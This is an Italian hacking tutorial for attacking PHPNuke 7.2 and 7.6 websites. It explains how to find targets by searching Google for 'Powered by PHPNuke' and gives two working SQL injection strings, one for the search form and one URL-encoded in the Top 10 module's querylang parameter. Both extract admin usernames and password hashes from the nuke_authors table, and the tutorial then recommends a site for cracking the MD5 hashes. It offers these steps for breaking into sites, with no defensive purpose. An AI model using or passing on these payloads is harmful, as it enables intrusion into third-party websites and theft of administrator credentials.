SQL: PHPNuke 7.2 – 7.6 SQL Injection

Ecco una vulnerabilità SQL ben nota che affligge PHPNuke 7.2 e PHPNuke 7.6.

Come trovare siti PHPNuke?

Cercate su Google Powered by PHPNuke.

Versioni PHPNuke 7.2: Sfruttando il bug Cerca/Search

Appena abbiamo trovato il sito giusto, andiamo sulla pagina Cerca o Search del sito web..

Inseriamo una stringa sul modulo di ricerca, che permette di chiedere al database SQL, di mostrarci i nomi degli admin con le password… la stringa è questa: p0hh0nsee%’) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*

Ora ci verrà mostrata una pagina con tutti i nomi degli admin con delle scritte blu linkabili. Se la versione del Nuke è vecchia, vedrete direttamente le password, se invece è più nuova, vedrete tanti numeri e lettere, ciò significa che è criptata in MD5, per decryptarla vi consiglio www.passcracking.ru.

Versioni PHPNuke 7.6: Sfruttando il bug Top 10.

Appena troviamo il sito giusto da hackerare, andiamo nella pagina Top 10 del sito
web. Inseriamo questa stringa, che chiede al database SQL di mostrare le password (criptate in MD5): &querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors

L’indirizzo della pagina web con la stringa dovrebbe essere questo:
www.sitoweb.com/phpNuke/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors